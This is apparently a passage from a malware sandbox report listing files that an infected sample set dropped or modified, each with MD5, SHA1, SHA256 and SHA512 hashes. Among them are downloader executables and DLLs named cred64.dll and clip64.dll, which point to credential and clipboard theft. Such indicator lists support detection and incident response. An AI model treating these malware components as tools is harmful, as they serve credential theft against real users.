| SHA512 | 1829cfd39d0119a3d93b3adbfd51bccb5732992e32e8fb1a73ee35618598a27f401fa418bc92675a005e01ef175cc38959258bb50dafb61b44af6f78f16066e1 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\tester.exe
| MD5 | c7174152bc891a4d374467523371ff11 |
| SHA1 | 6ae1bdfcc4f8752842bdfa49a57709512c5a14c5 |
| SHA256 | fc4021427512de18c4f01d85a3fe16f424234a62bdbfcac7a7b818797365113d |
| SHA512 | 79823229323c202f92ffcc593be110ef1e2fcc13f812fae978957cc5ace71abc86e10d9e0a3b8ee4f83292b6f7c3186239fdd0110923ad01932c4adec3b67fe6 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\ctx.exe
| MD5 | 4962575a2378d5c72e7a836ea766e2ad |
| SHA1 | 549964178b12017622d3cbdda6dbfdef0904e7e2 |
| SHA256 | eff5fad47b9c739b09e760813b2bcbb0788eb35598f72e64ff95c794e72e6676 |
| SHA512 | 911a59f7a6785dd09a57dcd6d977b8abd5e160bd613786e871a1e92377c9e6f3b85fe3037431754bbdb1212e153776efca5fadac1de6b2ad474253da176e8e53 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\vvv.exe
| MD5 | 99f996079094ad472d9720b2abd57291 |
| SHA1 | 1ff6e7cafeaf71a5debbc0bb4db9118a9d9de945 |
| SHA256 | 833fd615ec3e7576960a872fff5a4459b0c756338068f87341655849d1f7e1af |
| SHA512 | 6a6d4034b37f9bb3b4a0b455de7485b990bf3bd3042316d7261bd2973dbe522490654045d579a6df58a4b834e04c377897eea41798e6b1f5fdbc45a2bb0d127f |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | a18dd3c883876a45a4eaa86f5a7f0e84 |
| SHA1 | ae45f43e0adfba483a36e4b40fa1816631abd24d |
| SHA256 | 720ed3567096f3eaeed70facba39d7ef74bd81e7fbf9c2f9417cacbffe997a97 |
| SHA512 | bd3ea4bb833063160395b14d15429f2cb7a4202c4c84817a08778b1100520c2ca751b78cca2208ecb16d5f818e0ef76a1be618e70a21a7c4344951b5d452bb7d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\fb3b0dbfee58fac8.customDestinations-ms
| MD5 | 6538513b18db417f75de94bc60f7d9c1 |
| SHA1 | a14cd0669d49a280e98c9006498e17af201fa0ef |
| SHA256 | 926f515daa2f28013660c1171cc254237affecc8679f3a14bf426a24b37c293d |
| SHA512 | 406835a5e69448baab4859da64c0cf41fc6837371611c7c0b44436fc344a008baaaab830e4b13a6a796ba0a7ee7049e2a2febd50ef5ad11497aa82cb64fd4c1e |
C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex
| MD5 | f3b25701fe362ec84616a93a45ce9998 |
| SHA1 | d62636d8caec13f04e28442a0a6fa1afeb024bbb |
| SHA256 | b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209 |
| SHA512 | 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84 |
C:\Users\Admin\AppData\Local\Temp\TCD55C4.tmp\iso690.xsl
| MD5 | ff0e07eff1333cdf9fc2523d323dd654 |
| SHA1 | 77a1ae0dd8dbc3fee65dd6266f31e2a564d088a4 |
| SHA256 | 3f925e0cc1542f09de1f99060899eafb0042bb9682507c907173c392115a44b5 |
| SHA512 | b4615f995fab87661c2dbe46625aa982215d7bde27cafae221dca76087fe76da4b4a381943436fcac1577cb3d260d0050b32b7b93e3eb07912494429f126bb3d |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | e43c565949b9e2d504ade5ec0282dd07 |
| SHA1 | 4ff5ed6ff055115f5fed5a6a9bff9eeb3ad6a140 |
| SHA256 | d94f09ef2563b3de209ed5b48021a99cca1f9536e35a0de14d51806e05ab8d69 |
| SHA512 | fe7856801f0c0e652329c295a8cd07bba4150249e8b144832789adeed7c0eb1b2e760fe8e712ef075bce3a9baf2b81be9684081b64ede6dc92a4d1da9ff5a953 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\connect.exe
| MD5 | 1a36cf24b944aaa197043b753b0a6489 |
| SHA1 | ecd13b536536fae303df439e8b6c8967b16d38b5 |
| SHA256 | b04789056a7934edce4956963a37abed9558febe44cc83ada5e3a5708caa11cc |
| SHA512 | ef2c20de078b3ce2e34cb57f6789f60c4e801d3ca76b6a86247d985bc8e6a0ec723f4cd157625094c5345f4209eeef6ecec949586cbb53fe24e7c34d7778e368 |
C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat
| MD5 | 2451fc4cda296658e2f4e0270feb8778 |
| SHA1 | 796984a95ecea713cf4335de9ae4052adbf33c2f |
| SHA256 | 7454b054c73a86e0a841f90d21d97d4159b0aeb9e4cedb57e24c5ad0fbff55b8 |
| SHA512 | 2526076bc050858bc6fd18ff7f9daf3c020d56f496b433d52586a51c6af6b6d234678b18ce102c8513f548dc8225c9cb8f316ffd04ca216583810e1f07965ecd |
C:\Users\Admin\Desktop\hosts.txt
| MD5 | eeea48303c423557de1f85d661c93e27 |
| SHA1 | ac6f851df1a554ddfddf983664b60be143be76c9 |
| SHA256 | 5ad0743d139f93931d848073506f3acd0d24c3abd530732e3862e07571548e98 |
| SHA512 | 201c4fd8d95bee7db480c69291fb20b13cfefaf19a9026fb36613461e637313a16264728cf7b4a48e64d446df7548c7b3a2db81a1ace2c54be2776a30a6e05cb |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzureConnect.exe
| MD5 | 4afb95fbf1d102bb7b01e7ea40efc57c |
| SHA1 | 7753e2e22808ac25bc9e9b6b5c93e28154457433 |
| SHA256 | 12a1ee910e42c3b85491cd8006e96062e14c87d64996e5223f3713cbb4077caa |
| SHA512 | d97607e607b81432cf9ea1b71277bf632cbdd25a10fb9b3e019c314bbbba4b715959c4f6e4b406ad8accbe2f7407491f18c7d61f05776778e78a579214e934eb |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | 7faa7179268be819c9e9028df0fa0893 |
| SHA1 | 20da9efc6d1a7dfc6db38a4b34a74b41d3ddc29b |
| SHA256 | 49d62cef712a77b670e825bb408b70c37c630e758253da8193191811d4fd70f5 |
| SHA512 | b650a71310c20d5ef08abc4143eb4df3e3398ff6d0a1193066126f3d88e8751c92524d952efb593b5dd7f384d739502766b2147de07a15a593a89df71a4dcf47 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms
| MD5 | a57d9f055b815f18280ea2989aa51521 |
| SHA1 | 925d0844882b8dd4720614e012c527a290c8329d |
| SHA256 | cf892e11c6793e8397cf2b51f7ffd32e39889be5c6b092b14381236a6d1c4ccb |
| SHA512 | d5637e3440ada3921ed05a5e80b0fa9f9a561aeb5b7d8e536e1d097268c9e8c5c530f3dff9c2f6fa3220c20b74b901544fd36a27c536bf3761388dbdccbfaf41 |
C:\Users\Admin\AppData\Local\Temp\565375082730
| MD5 | 150aa48673b1949282cea70f73a1e700 |
| SHA1 | 5221eb9f51cbbdc0303ee719dc59905d91964699 |
| SHA256 | a866c1d5d74d855199136c350db55a08298fa49498795729a3fa612a0b417701 |
| SHA512 | 13fe514fa34731bb090f5c547b319301d5790f9d532f3830150d639d14e4a41ab0a3ea1ea1efe66e9fcf4ee21104d402118a1e31cd9f44591c58818e623ee498 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\Javvvum.exe
| MD5 | aed024049f525c8ae6671ebdd7001c30 |
| SHA1 | fadd86e0ce140dc18f33193564d0355b02ee9b05 |
| SHA256 | 9c45c5456167f65156faa1313ad8bbaffb8aa375669bf756fe0273580a621494 |
| SHA512 | ec0846be717d200639c529a4ac14f47f6b466fa2c8231049bc474183b285c7d8ce3200ff9f9c813171de8b7eb15c63f229b4748c751a167d7eff3489249738d2 |
C:\Users\Admin\AppData\Roaming\43266f2abbf198\cred64.dll
| MD5 | c6aabb27450f1a9939a417e86bf53217 |
| SHA1 | b8ef3bb7575139fd6997379415d7119e452b5fc4 |
| SHA256 | b91a3743c7399aee454491862e015ef6fc668a25d1aa2816e065a86a03f6be35 |
| SHA512 | e5fe205cb0f419e0a320488d6fa4a70e5ed58f25b570b41412ebd4f32bbe504ff75acb20bfea22513102630cf653a41e5090051f20af2ed3aadb53ce16a05944 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
| MD5 | 76025b9fb7201faad57e95ac873e37eb |
| SHA1 | 25c01eb7d9a63723eac365d764e96e45e953a5c1 |
| SHA256 | 03bb8cf70d96e562ff19d80ef9a01f8255aaa1a6ffa2005dbc004bb718e05269 |
| SHA512 | 6f5c8680823f3fc01c4668585518a1a535959ec456bca88f81eebe0484dc6cf6bbc40044db4ac7d18798529a20feca039bd986f243db817f27df220a7917a28f |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | f9c8920fe8b321eb2fa11bc15993a2f8 |
| SHA1 | 27a0ffe024a4a9ef73dc83a665255641b8c9c2d0 |
| SHA256 | fa5da076158c2fa32859be6ca10904246ce539a783f2eb4e17a2277d0fc67be8 |
| SHA512 | dc95e41401cb5ab0f77bb944aacdf631c2dedbd811b8e0f39aba412d48a463ed248e689e48b375b02eea8f88d722b8236921562ca516f73b8f42e92ae67e4b72 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\5bcde959-433c-423d-81dc-9f79674949c9.tmp
| MD5 | 3c791f5249bf93862d906103974c3523 |
| SHA1 | a823199373a4b250124967709132b51493bb0eb8 |
| SHA256 | 910c67062cf603f7dc25e67fd9bb6be0af1401ee702406347df3151d66be6366 |
| SHA512 | c639800204e57b1d3eabdc3b8f346523381edd9ade6978439b45af8abb9d696be5f6a4fc7bda6d5c3637b08142ecdb30bd4ee6936db2f856a741ded1589a7418 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\random.exe
| MD5 | 3a425626cbd40345f5b8dddd6b2b9efa |
| SHA1 | 7b50e108e293e54c15dce816552356f424eea97a |
| SHA256 | ba9212d2d5cd6df5eb7933fb37c1b72a648974c1730bf5c32439987558f8e8b1 |
| SHA512 | a7538c6b7e17c35f053721308b8d6dc53a90e79930ff4ed5cffecaa97f4d0fbc5f9e8b59f1383d8f0699c8d4f1331f226af71d40325022d10b885606a72fe668 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\client.exe
| MD5 | 52a3c7712a84a0f17e9602828bf2e86d |
| SHA1 | 15fca5f393bc320b6c4d22580fe7d2f3a1970ac2 |
| SHA256 | afa87c0232de627e818d62578bde4809d8d91a3021bc4b5bdb678767844e2288 |
| SHA512 | 892e084cfe823d820b00381625edda702a561be82c24a3e2701a1b2a397d4fc49e45ca80ac93a60d46efc83b224a6dc7ea1ea85f74ee8a27220a666b3f7ebfac |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 5391d0162a521a0f24e088523226b26c |
| SHA1 | fd3a146107ecc04dfb27835772c9ac45349fe568 |
| SHA256 | ce8340c239ef1f8981d8bd1eb1624660778cf2c15e1fb91c56db48e473789ea4 |
| SHA512 | b5413834344815455b998ebbfcb0da1da90d2190b20fce557cc72bff79f236c7a050c0b9d4f3ad31f13f74496f82a757534b7d74b8cb6da28ca79c4f6e5aaefa |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | dc8494fac8e05865b69c41a4cfadbfb2 |
| SHA1 | e887e73f63911fb39841e82f062d741b59ea029c |
| SHA256 | 3c08e84c73e9d838b0d536048a3287cbd9b0e844e86dcfa1501ec6a341376a51 |
| SHA512 | 7a1c9496a84272525b2a7b5ba1f3d22f0c9e226f354c9f68f4a110ed9eb8564cd75adbafeb0f665c4cbcc21c2f19c6876e8b444c338fa65dbfe4499cdd5489df |
C:\Users\Admin\AppData\Roaming\43266f2abbf198\clip64.dll
| MD5 | c2f3fbbbe6d5f48a71b6b168b1485866 |
| SHA1 | 1cd56cfc2dc07880b65bd8a1f5b7147633f5d553 |
| SHA256 | c7ed512058bc924045144daa16701da10f244ac12a5ea2de901e59dce6470839 |
| SHA512 | e211f18c2850987529336e0d20aa894533c1f6a8ae6745e320fd394a9481d3a956c719ac29627afd783e36e5429c0325b98e60aee2a830e75323c276c72f845a |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\88ab67c2-aa7b-4b44-b37e-656d7fc2b757.tmp
| MD5 | 9da54d489c1462f05625eda261a812e4 |
| SHA1 | 46c07587011f3a28c0c075214182841fb6fb2dc3 |
| SHA256 | 982c96037fd7a76ed24bec3480ce9a520591163c943d87db6c66f25e3b69fa94 |
| SHA512 | 78cf67f71c9c844d379214256b8d3b96b9fd3e64881c6e635a64a4e8adf3bb1c745ecee82130db602283674e9448be880bfaf85e6ef98a0acf088570479eab21 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 30a145d07c2e62d05e34afd1cf0562d8 |
| SHA1 | d802c12415a401255b66ac6c085f99e1e42d58f8 |
| SHA256 | 48f5f2c72c7e6459cde0d6e495817f365fd8d0f26229c15bd64b47060e518e50 |
| SHA512 | b1c17acaa281e0c792951a5032c5f4e66f03084215a8e631f1cf462e48560098c942da220f1bd06eac68effd3e73f9732c24cab714bf7365e4f71689b3fa0814 |
C:\ProgramData\fdgfghgfhg\logs.dat
| MD5 | e5452bd37e07ea03b62fabb8313fc416 |
| SHA1 | a370c9e527eb3b613f6c5218c1353740ae5a962c |
| SHA256 | b7f096c66f0d5e03302359fd9c442b4c91b07f5df3ced84ccf601c3b94494e29 |
| SHA512 | 836d2d30ddd30188fb90322268869cac6acd36cfc790029c905a6369a02d84d5cffcba7205514a15a440dbefaaafee17cad651860db2aa02d029e8a40e6a8ed4 |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\l4.exe
| MD5 | d68f79c459ee4ae03b76fa5ba151a41f |
| SHA1 | bfa641085d59d58993ba98ac9ee376f898ee5f7b |
| SHA256 | aa50c900e210abb6be7d2420d9d5ae34c66818e0491aabd141421d175211fed6 |
| SHA512 | bd4ef3e3708df81d53b2e9050447032e8dcdcc776cf0353077310f208a30dab8f31d6ec6769d47fb6c05c642bdd7a58fb4f93d9d28e2de0efc01312fbc5e391e |
C:\ProgramData\registro\registros.dat
| MD5 | 0ea9c8ff992a7b4b2acfd924877013f2 |
| SHA1 | d982838dc317209f4b2dc2ff62fcdb174837b206 |
| SHA256 | 3701c19cafcd96152d6107979b33c3728a6dec6a014e1303abb2c9a6eab0df74 |
| SHA512 | c005eb6185306ac00fc49e6ce3791e43b52d83c9a4c394c2525d92057418c19d1aa5fa92e67f2869e84b73caac5f88ed6de38c9a460aa38c3ad450cc729d01af |
C:\Users\Admin\Desktop\241127-xqsswsslej_pw_infected\Downloaders\New Text Document mod.exse\a\AzVRM7c.exe
| MD5 | 3567cb15156760b2f111512ffdbc1451 |
| SHA1 | 2fdb1f235fc5a9a32477dab4220ece5fda1539d4 |
| SHA256 | 0285d3a6c1ca2e3a993491c44e9cf2d33dbec0fb85fdbf48989a4e3b14b37630 |
| SHA512 | e7a31b016417218387a4702e525d33dd4fe496557539b2ab173cec0cb92052c750cfc4b3e7f02f3c66ac23f19a0c8a4eb6c9d2b590a5e9faeb525e517bc877ba |
C:\ProgramData\fdgfghgfhg\logs.dat
| MD5 | a77e2262ad1ba580c1c97132986bbe46 |
| SHA1 | ffa8963a0d4fb7378537664c486a63d2a3314a76 |
| SHA256 | 6a602726dfe7af9a7ed7adf93bac5938f7f6e8b26211f514188d944ea5b373b7 |
| SHA512 | e2894aa689b350e709123fb6b625c1f455dfdd0b5e594673ea5d5189b2dee6e462b9d4923bd86c8736eb73288b1d8d3009628cf479a228c24ebf47b7aa1bd66e |
C:\ProgramData\registro\registros.dat
| MD5 | 7929e4bce367ad1eb0d570c2d8df6a58 |
| SHA1 | 4c864fd07869e11bd5a2ad36853cf3fb287e14be |
| SHA256 | 65456ef85679c46a963863a9ceace9a24f1dedfd46eea654f15d17b449a4e0e5 |
| SHA512 | db5c94a263f72290b99aba227d7b583cb8defe84c641d440573a57d250026cafe487c41de6a2a5d30d3184002fea8850e36632c56a85135ba94a888b5336929a |